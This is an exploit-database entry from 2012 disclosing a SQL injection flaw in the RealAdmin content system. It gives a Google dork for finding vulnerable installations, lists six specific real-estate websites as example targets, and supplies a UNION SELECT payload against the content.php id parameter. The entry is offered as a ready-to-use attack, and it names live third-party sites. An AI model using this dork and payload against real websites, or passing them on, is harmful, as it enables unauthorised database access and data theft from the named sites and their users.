RealAdmin - SQL Injection Vulnerability



EKU-ID: 1994 CVE: OSVDB-ID:
Author: ShinoBi-Dz Published: 2012-04-23 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#########################################################################
# Exploit Title: [ RealAdmin - SQL Injection Vulnerability ]                
# Date: [22-04-2012]                                                   
# Author: [ShinoBi-Dz]
# E-mail : ShinoBiDz442@gmail.com                                      
# Facebook : https://www.facebook.com/shinobi.benz                     
# Category: [webapps]                                                   
# Google dork: inurl:"content.php?id=" intext:"powered by realadmin" 
# Tested on: [Windows 7 ]                                              
#########################################################################

Example Sites :
http://exitrealtycitadel.realadmin.ca/content.php?id=1216'
http://kmammen.realadmin.ca/content.php?id=1916'
http://citigrouprealty.ca/content.php?id=908'
http://www.exitinterlake.com/content.php?id=2963'
http://www.gorhamrealestate.ca/content.php?id=284'
http://www.exitplatinum.com/content.php?id=2025'

and more in Google


[~]Exploit/p0c :
http://www.site.com/content.php?id=-[]+union+select+1,2,3,4,5,6,7,8,9--


Greetz [ Arm4dill0.DZ - KedAns-Dz - HMD442 - All Hacker's ALG - Mouh-Marvel ]

                        -[Freedom to Palestine]-